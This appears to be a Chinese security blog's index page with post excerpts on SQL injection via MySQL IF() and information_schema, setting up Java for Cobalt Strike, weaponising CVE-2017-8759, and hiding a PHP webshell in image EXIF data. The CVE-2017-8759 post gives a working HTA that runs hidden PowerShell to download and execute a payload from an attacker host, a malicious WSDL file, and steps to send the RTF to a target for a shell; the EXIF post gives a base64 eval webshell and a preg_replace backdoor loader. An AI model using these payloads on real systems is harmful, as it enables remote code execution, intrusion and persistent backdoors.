0%

[TOC]

利用场景

  1. 一般为SQL盲注或时间注入在时候。
  2. 逗号,没有被过滤的情况下。

    如果注入点过滤了逗号,,可用CASE表达式绕过,参考SQL注入中的CASE表达式

MySql中的IF表达式

定义参考

  1. 官方参考:MYSQL IF表达式参考

  2. 语法

    1
    IF(expr1,expr2,expr3)
  3. 关于返回值
    3.1 如果expr1不等于0,且expr1不等于NULL,则整个表达式的结果为expr2,否则为expr3
    3.2 如果expr1expr2中只有一个为NULL,则整个IF()表达式的返回值类型为那个非NULL表达式的类型。
    3.3 默认的返回值遵守以下规则:

    1
    2
    3
    4
    如果`expr2`或者`expr3`会产生一个`string`,则返回值为`string`;
    如果`expr2`和`expr3`都是`string`,且任何其中一个是大小写敏感的,则返回值也是大小写敏感的;
    如果`expr3`或者`expr3`产生一个浮点类型的值,则结果为一个浮点类型的值;
    如果`expr2`或者`expr3`会产生一个整数,则结果为一个整数。

##举例

mysql> select if(1<0,sleep(5),sleep(2)); 0 1 +---------------------------+ | if(1<0,sleep(5),sleep(2)) row in set (2.00 sec) < pre>
Read more »

[TOC]
##介绍
information_schema数据库是在mysql>5.0版本之后产生的一个虚拟数据库,物理上并不存在。
information_schema数据库类似于“数据字典”,提供了访问数据库元数据的方式,即数据的数据。比如数据库名或表名、列类型、访问权限(更细化的访问方式)。
##information_schema所有数据表一揽

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
mysql> use information_schema;
Database changed
mysql> show tables;
+---------------------------------------+
| Tables_in_information_schema |
+---------------------------------------+
| CHARACTER_SETS |
| COLLATIONS |
| COLLATION_CHARACTER_SET_APPLICABILITY |
| COLUMNS |
| COLUMN_PRIVILEGES |
| ENGINES |
| EVENTS |
| FILES |
| GLOBAL_STATUS |
| GLOBAL_VARIABLES |
| KEY_COLUMN_USAGE |
| OPTIMIZER_TRACE |
| PARAMETERS |
| PARTITIONS |
| PLUGINS |
| PROCESSLIST |
| PROFILING |
| REFERENTIAL_CONSTRAINTS |
| ROUTINES |
| SCHEMATA |
| SCHEMA_PRIVILEGES |
| SESSION_STATUS |
| SESSION_VARIABLES |
| STATISTICS |
| TABLES |
| TABLESPACES |
| TABLE_CONSTRAINTS |
| TABLE_PRIVILEGES |
| TRIGGERS |
| USER_PRIVILEGES |
| VIEWS |
| INNODB_LOCKS |
| INNODB_TRX |
| INNODB_SYS_DATAFILES |
| INNODB_LOCK_WAITS |
| INNODB_SYS_TABLESTATS |
| INNODB_CMP |
| INNODB_METRICS |
| INNODB_CMP_RESET |
| INNODB_CMP_PER_INDEX |
| INNODB_CMPMEM_RESET |
| INNODB_FT_DELETED |
| INNODB_BUFFER_PAGE_LRU |
| INNODB_SYS_FOREIGN |
| INNODB_SYS_COLUMNS |
| INNODB_SYS_INDEXES |
| INNODB_FT_DEFAULT_STOPWORD |
| INNODB_SYS_FIELDS |
| INNODB_CMP_PER_INDEX_RESET |
| INNODB_BUFFER_PAGE |
| INNODB_CMPMEM |
| INNODB_FT_INDEX_TABLE |
| INNODB_FT_BEING_DELETED |
| INNODB_SYS_TABLESPACES |
| INNODB_FT_INDEX_CACHE |
| INNODB_SYS_FOREIGN_COLS |
| INNODB_SYS_TABLES |
| INNODB_BUFFER_POOL_STATS |
| INNODB_FT_CONFIG |
+---------------------------------------+
59 rows in set (0.00 sec)

共有59张表,但是我们在SQL注入过程中,主要用到其中7张表,最重要的是SCHEMATABLESCOLUMNS这三张表。
##重要表结构
###SCHEMATA表
information_schema.SCHEMATA表提供了当前mysql实例中所有数据库的信息。是show databases的结果。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
mysql> select * from information_schema.schemata;
+--------------+--------------------+----------------------------+------------------------+----------+
| CATALOG_NAME | SCHEMA_NAME | DEFAULT_CHARACTER_SET_NAME | DEFAULT_COLLATION_NAME | SQL_PATH |
+--------------+--------------------+----------------------------+------------------------+----------+
| def | information_schema | utf8 | utf8_general_ci | NULL |
| def | mysql | latin1 | latin1_swedish_ci | NULL |
| def | performance_schema | utf8 | utf8_general_ci | NULL |
| def | test | latin1 | latin1_swedish_ci | NULL |
+--------------+--------------------+----------------------------+------------------------+----------+
4 rows in set (0.00 sec)

mysql> show databases;
+--------------------+
| Database |
+--------------------+
| information_schema |
| mysql |
| performance_schema |
| test |
+--------------------+
4 rows in set (0.00 sec)

###TABLES表
information_schema.TABLES表提供了关于数据库中的的信息(包括视图)。是show tables from [schemaname]的结果。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
mysql> desc information_schema.tables;
+-----------------+---------------------+------+-----+---------+-------+
| Field | Type | Null | Key | Default | Extra |
+-----------------+---------------------+------+-----+---------+-------+
| TABLE_CATALOG | varchar(512) | NO | | | |
| TABLE_SCHEMA | varchar(64) | NO | | | |
| TABLE_NAME | varchar(64) | NO | | | |
| TABLE_TYPE | varchar(64) | NO | | | |
| ENGINE | varchar(64) | YES | | NULL | |
| VERSION | bigint(21) unsigned | YES | | NULL | |
| ROW_FORMAT | varchar(10) | YES | | NULL | |
| TABLE_ROWS | bigint(21) unsigned | YES | | NULL | |
| AVG_ROW_LENGTH | bigint(21) unsigned | YES | | NULL | |
| DATA_LENGTH | bigint(21) unsigned | YES | | NULL | |
| MAX_DATA_LENGTH | bigint(21) unsigned | YES | | NULL | |
| INDEX_LENGTH | bigint(21) unsigned | YES | | NULL | |
| DATA_FREE | bigint(21) unsigned | YES | | NULL | |
| AUTO_INCREMENT | bigint(21) unsigned | YES | | NULL | |
| CREATE_TIME | datetime | YES | | NULL | |
| UPDATE_TIME | datetime | YES | | NULL | |
| CHECK_TIME | datetime | YES | | NULL | |
| TABLE_COLLATION | varchar(32) | YES | | NULL | |
| CHECKSUM | bigint(21) unsigned | YES | | NULL | |
| CREATE_OPTIONS | varchar(255) | YES | | NULL | |
| TABLE_COMMENT | varchar(2048) | NO | | | |
+-----------------+---------------------+------+-----+---------+-------+
21 rows in set (0.01 sec)

其中,table_schema为数据库名称;table_name为表名;table_rows为该表中的数据行数.
如想通过information_schema查询名为mysql的数据库中所有表:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
mysql> select * from information_schema.tables where table_schema='mysql';
+---------------+--------------+---------------------------+------------+--------+---------+------------+------------+----------------+-------------+--------------------+--------------+-----------+----------------+---------------------+---------------------+---------------------+-------------------+----------+--------------------+-----------------------------------------+
| TABLE_CATALOG | TABLE_SCHEMA | TABLE_NAME | TABLE_TYPE | ENGINE | VERSION | ROW_FORMAT | TABLE_ROWS | AVG_ROW_LENGTH | DATA_LENGTH | MAX_DATA_LENGTH | INDEX_LENGTH | DATA_FREE | AUTO_INCREMENT | CREATE_TIME | UPDATE_TIME | CHECK_TIME | TABLE_COLLATION | CHECKSUM | CREATE_OPTIONS | TABLE_COMMENT |
+---------------+--------------+---------------------------+------------+--------+---------+------------+------------+----------------+-------------+--------------------+--------------+-----------+----------------+---------------------+---------------------+---------------------+-------------------+----------+--------------------+-----------------------------------------+
| def | mysql | columns_priv | BASE TABLE | MyISAM | 10 | Fixed | 0 | 0 | 0 | 227994731135631359 | 4096 | 0 | NULL | 2016-08-30 19:14:49 | 2016-08-30 19:14:49 | NULL | utf8_bin | NULL | | Column privileges |
| def | mysql | db | BASE TABLE | MyISAM | 10 | Fixed | 0 | 0 | 0 | 123848989752688639 | 2048 | 0 | NULL | 2016-08-30 19:14:48 | 2016-08-30 19:14:48 | NULL | utf8_bin | NULL | | Database privileges |
| def | mysql | event | BASE TABLE | MyISAM | 10 | Dynamic | 0 | 0 | 0 | 281474976710655 | 2048 | 0 | NULL | 2016-08-30 19:14:49 | 2016-08-30 19:14:49 | NULL | utf8_general_ci | NULL | | Events |
| def | mysql | func | BASE TABLE | MyISAM | 10 | Fixed | 0 | 0 | 0 | 162974011515469823 | 1024 | 0 | NULL | 2016-08-30 19:14:48 | 2016-08-30 19:14:48 | NULL | utf8_bin | NULL | | User defined functions |
| def | mysql | general_log | BASE TABLE | CSV | 10 | Dynamic | 2 | 0 | 0 | 0 | 0 | 0 | NULL | NULL | NULL | NULL | utf8_general_ci | NULL | | General log |
| def | mysql | help_category | BASE TABLE | MyISAM | 10 | Dynamic | 40 | 28 | 1120 | 281474976710655 | 3072 | 0 | NULL | 2016-08-30 19:14:53 | 2016-08-30 19:14:53 | NULL | utf8_general_ci | NULL | | help categories |
| def | mysql | help_keyword | BASE TABLE | MyISAM | 10 | Fixed | 611 | 197 | 120367 | 55450570411999231 | 21504 | 0 | NULL | 2016-08-30 19:14:53 | 2016-08-30 19:14:53 | NULL | utf8_general_ci | NULL | | help keywords |
| def | mysql | help_relation | BASE TABLE | MyISAM | 10 | Fixed | 1218 | 9 | 10962 | 2533274790395903 | 21504 | 0 | NULL | 2016-08-30 19:14:53 | 2016-08-30 19:14:53 | NULL | utf8_general_ci | NULL | | keyword-topic relation |
| def | mysql | help_topic | BASE TABLE | MyISAM | 10 | Dynamic | 583 | 975 | 568664 | 281474976710655 | 22528 | 0 | NULL | 2016-08-30 19:14:53 | 2016-08-30 19:14:53 | NULL | utf8_general_ci | NULL | | help topics |
| def | mysql | innodb_index_stats | BASE TABLE | InnoDB | 10 | Compact | 3 | 5461 | 16384 | 0 | 0 | 0 | NULL | 2017-04-19 16:55:05 | NULL | NULL | utf8_bin | NULL | stats_persistent=0 | |
| def | mysql | innodb_table_stats | BASE TABLE | InnoDB | 10 | Compact | 1 | 16384 | 16384 | 0 | 0 | 0 | NULL | 2017-04-19 16:55:05 | NULL | NULL | utf8_bin | NULL | stats_persistent=0 | |
| def | mysql | ndb_binlog_index | BASE TABLE | MyISAM | 10 | Dynamic | 0 | 0 | 0 | 281474976710655 | 1024 | 0 | NULL | 2016-08-30 19:14:49 | 2016-08-30 19:14:49 | NULL | latin1_swedish_ci | NULL | | |
| def | mysql | plugin | BASE TABLE | MyISAM | 10 | Dynamic | 0 | 0 | 0 | 281474976710655 | 1024 | 0 | NULL | 2016-08-30 19:14:48 | 2016-08-30 19:14:48 | NULL | utf8_general_ci | NULL | | MySQL plugins |
| def | mysql | proc | BASE TABLE | MyISAM | 10 | Dynamic | 0 | 0 | 0 | 281474976710655 | 2048 | 0 | NULL | 2016-08-30 19:14:49 | 2016-08-30 19:14:49 | NULL | utf8_general_ci | NULL | | Stored Procedures |
| def | mysql | procs_priv | BASE TABLE | MyISAM | 10 | Fixed | 0 | 0 | 0 | 239253730204057599 | 4096 | 0 | NULL | 2016-08-30 19:14:49 | 2016-08-30 19:14:49 | NULL | utf8_bin | NULL | | Procedure privileges |
| def | mysql | proxies_priv | BASE TABLE | MyISAM | 10 | Fixed | 2 | 693 | 1386 | 195062158860484607 | 5120 | 0 | NULL | 2016-08-30 19:14:53 | 2016-08-30 19:14:53 | 2016-08-30 19:14:53 | utf8_bin | NULL | | User proxy privileges |
| def | mysql | servers | BASE TABLE | MyISAM | 10 | Fixed | 0 | 0 | 0 | 433752939111120895 | 1024 | 0 | NULL | 2016-08-30 19:14:48 | 2016-08-30 19:14:48 | NULL | utf8_general_ci | NULL | | MySQL Foreign Servers table |
| def | mysql | slave_master_info | BASE TABLE | InnoDB | 10 | Compact | 0 | 0 | 16384 | 0 | 0 | 0 | NULL | 2017-04-19 16:55:05 | NULL | NULL | utf8_general_ci | NULL | stats_persistent=0 | Master Information |
| def | mysql | slave_relay_log_info | BASE TABLE | InnoDB | 10 | Compact | 0 | 0 | 16384 | 0 | 0 | 0 | NULL | 2017-04-19 16:55:05 | NULL | NULL | utf8_general_ci | NULL | stats_persistent=0 | Relay Log Information |
| def | mysql | slave_worker_info | BASE TABLE | InnoDB | 10 | Compact | 0 | 0 | 16384 | 0 | 0 | 0 | NULL | 2017-04-19 16:55:05 | NULL | NULL | utf8_general_ci | NULL | stats_persistent=0 | Worker Information |
| def | mysql | slow_log | BASE TABLE | CSV | 10 | Dynamic | 2 | 0 | 0 | 0 | 0 | 0 | NULL | NULL | NULL | NULL | utf8_general_ci | NULL | | Slow log |
| def | mysql | tables_priv | BASE TABLE | MyISAM | 10 | Fixed | 0 | 0 | 0 | 239535205180768255 | 4096 | 0 | NULL | 2016-08-30 19:14:48 | 2016-08-30 19:14:48 | NULL | utf8_bin | NULL | | Table privileges |
| def | mysql | time_zone | BASE TABLE | MyISAM | 10 | Fixed | 0 | 0 | 0 | 1970324836974591 | 1024 | 0 | 1 | 2016-08-30 19:14:49 | 2016-08-30 19:14:49 | NULL | utf8_general_ci | NULL | | Time zones |
| def | mysql | time_zone_leap_second | BASE TABLE | MyISAM | 10 | Fixed | 0 | 0 | 0 | 3659174697238527 | 1024 | 0 | NULL | 2016-08-30 19:14:49 | 2016-08-30 19:14:49 | NULL | utf8_general_ci | NULL | | Leap seconds information for time zones |
| def | mysql | time_zone_name | BASE TABLE | MyISAM | 10 | Fixed | 0 | 0 | 0 | 55450570411999231 | 1024 | 0 | NULL | 2016-08-30 19:14:49 | 2016-08-30 19:14:49 | NULL | utf8_general_ci | NULL | | Time zone names |
| def | mysql | time_zone_transition | BASE TABLE | MyISAM | 10 | Fixed | 0 | 0 | 0 | 4785074604081151 | 1024 | 0 | NULL | 2016-08-30 19:14:49 | 2016-08-30 19:14:49 | NULL | utf8_general_ci | NULL | | Time zone transitions |
| def | mysql | time_zone_transition_type | BASE TABLE | MyISAM | 10 | Fixed | 0 | 0 | 0 | 10696049115004927 | 1024 | 0 | NULL | 2016-08-30 19:14:49 | 2016-08-30 19:14:49 | NULL | utf8_general_ci | NULL | | Time zone transition types |
| def | mysql | user | BASE TABLE | MyISAM | 10 | Dynamic | 5 | 70 | 352 | 281474976710655 | 2048 | 0 | NULL | 2016-08-30 19:14:48 | 2016-08-30 19:14:55 | NULL | utf8_bin | NULL | | Users and global privileges |
+---------------+--------------+---------------------------+------------+--------+---------+------------+------------+----------------+-------------+--------------------+--------------+-----------+----------------+---------------------+---------------------+---------------------+-------------------+----------+--------------------+-----------------------------------------+
28 rows in set (0.00 sec)

###COLUMNS表
information_schema.COLUMNS表提供了表中的的信息,详细表述了某张表的所有列以及每个列的信息,是show columns from [schemaname].[tablename]的结果。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
mysql> desc information_schema.COLUMNS;
+--------------------------+---------------------+------+-----+---------+-------+
| Field | Type | Null | Key | Default | Extra |
+--------------------------+---------------------+------+-----+---------+-------+
| TABLE_CATALOG | varchar(512) | NO | | | |
| TABLE_SCHEMA | varchar(64) | NO | | | |
| TABLE_NAME | varchar(64) | NO | | | |
| COLUMN_NAME | varchar(64) | NO | | | |
| ORDINAL_POSITION | bigint(21) unsigned | NO | | 0 | |
| COLUMN_DEFAULT | longtext | YES | | NULL | |
| IS_NULLABLE | varchar(3) | NO | | | |
| DATA_TYPE | varchar(64) | NO | | | |
| CHARACTER_MAXIMUM_LENGTH | bigint(21) unsigned | YES | | NULL | |
| CHARACTER_OCTET_LENGTH | bigint(21) unsigned | YES | | NULL | |
| NUMERIC_PRECISION | bigint(21) unsigned | YES | | NULL | |
| NUMERIC_SCALE | bigint(21) unsigned | YES | | NULL | |
| DATETIME_PRECISION | bigint(21) unsigned | YES | | NULL | |
| CHARACTER_SET_NAME | varchar(32) | YES | | NULL | |
| COLLATION_NAME | varchar(32) | YES | | NULL | |
| COLUMN_TYPE | longtext | NO | | NULL | |
| COLUMN_KEY | varchar(3) | NO | | | |
| EXTRA | varchar(30) | NO | | | |
| PRIVILEGES | varchar(80) | NO | | | |
| COLUMN_COMMENT | varchar(1024) | NO | | | |
+--------------------------+---------------------+------+-----+---------+-------+
20 rows in set (0.00 sec)
Read more »

[TOC]
##需求
Cobalt strike 用openjdk的话,不稳定,而且运行时候提示openjdk不推荐。

##更新步骤

  1. 下载JDK1.7,这个版本是比较稳定的,对于cobalt strike来说。下载地址我找到过一次,后来在也找不到了,不知道为啥。JDK1.7百度网盘地址下载在后面。

  2. 将下载的jdk1.7解压缩。

  3. /usr/lib/jvm下新建jdk17,将解压出来的目录移动到该目录下。

  4. 运行以下三条命令,安装JDK1.7:

    1
    2
    3
    update-alternatives --install /usr/bin/java java /usr/lib/jvm/jdk17/bin/java 1
    update-alternatives --install /usr/bin/javac javac /usr/lib/jvm/jdk17/bin/javac 1
    update-alternatives --install /usr/bin/jar jar /usr/lib/jvm/jdk17/bin/jar 1
  5. 配置JDK1.7为默认java:

    1
    2
    3
    4
    5
    6
    7
    8
    update-alternatives --config java
    There are 2 choices for the alternative java (providing /usr/bin/java).

    Selection Path Priority Status
    ------------------------------------------------------------
    * 0 /usr/lib/jvm/java-8-openjdk-amd64/jre/bin/java 1081 auto mode
    1 /usr/lib/jvm/java-8-openjdk-amd64/jre/bin/java 1081 manual mode
    2 /usr/lib/jvm/jdk17/bin/java 1 manual mode

    选择2。完成。

##截图
jdk2.png

jdk.png

##JDK1.7下载
JDK7 百度网盘

Read more »

[TOC]

主要参考文章是来自Lz1y 大神的文章:http://www.lz1y.cn/wordpress/?p=799

更新记录:

最新修改与:2017年9月28日

##工具

  1. https://github.com/Lz1y/CVE-2017-8759.git
  2. Cobalt Strike(请自行下载)

##步骤

  1. 在kali上面,执行命令
    git clone https://github.com/Lz1y/CVE-2017-8759.git
  2. 进入cobalt strike目录,执行:
    ./teamserver 192.168.1.9 123456
  3. 在cobalt strike目录,执行./cobaltstrike运行cobalt strike客户端。
  4. 在cobalt strike中新建Listener,类型用http的,端口输入80
  5. 进入该目录,依次修改以下文档:
    5.1 gedit cmd.jpg (先cp cmd.hta cmd.jpg)
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    <html>
    <head>
    <script language="VBScript">
    Sub window_onload
    window.resizeTo 0,0
    window.MoveTo -100,-100
    const impersonation = 3
    Const HIDDEN_WINDOW = 12
    Set Locator = CreateObject("WScript.Shell")
    Locator.Run"powershell.exe -nop -w hidden -c ""IEX (new-object net.webclient).downloadstring('http://192.168.1.9:80/a')""",0,FALSE
    window.close()
    end sub
    </script>
    <!--

    <script language="VBScript">
    Sub window_onload
    const impersonation = 3
    Const HIDDEN_WINDOW = 12
    Set Locator = CreateObject("WbemScripting.SWbemLocator")
    Set Service = Locator.ConnectServer()
    Service.Security_.ImpersonationLevel=impersonation
    Set objStartup = Service.Get("Win32_ProcessStartup")
    Set objConfig = objStartup.SpawnInstance_
    Set Process = Service.Get("Win32_Process")
    Error = Process.Create("powershell.exe -nop -w hidden calc.exe", null, objConfig, intProcessID)
    window.close()
    end sub
    </script>
    -->
    </head>
    </html>
    微信截图_20170927155342.png
  6. 2 gedit exploit.txt
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    <definitions
    xmlns="http://schemas.xmlsoap.org/wsdl/"
    xmlns:soap="http://schemas.xmlsoap.org/wsdl/soap/"
    xmlns:suds="http://www.w3.org/2000/wsdl/suds"
    xmlns:tns="http://schemas.microsoft.com/clr/ns/System"
    xmlns:ns0="http://schemas.microsoft.com/clr/nsassem/Logo/Logo">
    <portType name="PortType"/>
    <binding name="Binding" type="tns:PortType">
    <soap:binding style="rpc" transport="http://schemas.xmlsoap.org/soap/http"/>
    <suds:class type="ns0:Image" rootType="MarshalByRefObject"></suds:class>
    </binding>
    <service name="Service">
    <port name="Port" binding="tns:Binding">
    <soap:address location="http://192.168.1.9?C:\Windows\System32\mshta.exe?http://192.168.1.9/cmd.jpg"/>
    <soap:address location=";
    if (System.AppDomain.CurrentDomain.GetData(_url.Split('?')[0]) == null) {
    System.Diagnostics.Process.Start(_url.Split('?')[1], _url.Split('?')[2]);
    System.AppDomain.CurrentDomain.SetData(_url.Split('?')[0], true);
    } //"/>
    </port>
    </service>
    </definitions>
    微信截图_20170927155425.png
    ​ 以上两个文档的修改要与cobalt strike相对应
  7. 设置攻击环境:
    6.1 Attacks -> Web Drive-by -> Scripted Web Delivery,启动一个powershell木马,设置如下图:
    微信截图_20170928122539.png
    点击”Launch”之后,会生成一个一句话的Powershell代码,记住其中的网址部分,填写到cmd.jpg中,替换掉url。
    6.2 Attacks -> Web Drive-by -> Host File,将cmd.jpg,一定要将Mime Type修改为application/hta,此处生成的URL请填入exploit.txt中相应的位置。
    6.3 Attacks -> Web Drive-by -> Host File,将exploit.txt,无需特殊设置,设置好Local URI,点击Launch,复制生成的URL。此URLCreateRTF.py脚本-u参数使用的。
    6.3 使用大神的CreatRTF.py生成一个rtf文档,url填写为Host exploit.txt时产生的url。

至此,步骤完成,将生成的rtf文档发送给目标,即可在cobalt strike teamserver上得到shell。

##注意事项

Read more »

[TOC]
##意义
常见WebShell比较容易识别,利用图片exif信息可以达到隐藏WebShell的目的,以便持久化。(当然,这不是持久化的最好方法,不过作为临时持久化方法还是可以试试的)

##工具

  1. ExifTool
  2. 一句话木马
  3. 中国菜刀客户端
  4. 图片

##步骤

  1. 跟度娘要一张喜欢的图片
    略了

  2. 安装ExifTool
    2.1 环境Kali
    2.2 命令:apt-get install exiftool

  3. 向图片中写入一句话木马
    执行命令:
    exiftool "-comment=<test.php timg.jpg"
    exiftool "-model=/.*/e" timg.jpg
    字符串:
    aWYgKGlzc2V0KCRfUE9TVFsiY21kIl0pKSB7ZXZhbChzdHJpcHNsYXNoZXMoJF9QT1NUWyJjbWQiXSkpO30=
    Base64解码之后的东西,我就补贴出来了,总之密码是cmd
    执行结果如下:
    微信截图_20170918185956.png
    可以看到我们的一句话木马就写到了图片信息当中

  4. 修改版一句话木马

    1
    2
    3
    4
    <?php 
    $exif = exif_read_data('/www/web/phpshell_google_com/public_html/timg.jpg');
    preg_replace($exif[Model],$exif[Make],'');
    ?>
  5. GetShell
    微信截图_20170918191022.png

注意事项

[1] 图片路径可以是绝对路径,也可以是相对路径,如果是相对路径不要忘记./符号哦
[2] 测试PHP版本为5.5.根据大牛提示,preg_replace函数的/e选项在>5.6版本中废除,不过也有别的函数替代。思路是对的,注意函数使用。
[3] 不要长时间盯着苍老师的图片看,图有魔性~~
##参考
[1] https://www.trustwave.com/Resources/SpiderLabs-Blog/Hiding-Webshell-Backdoor-Code-in-Image-Files/
[2] https://blog.sucuri.net/2013/07/malware-hidden-inside-jpg-exif-headers.html

Read more »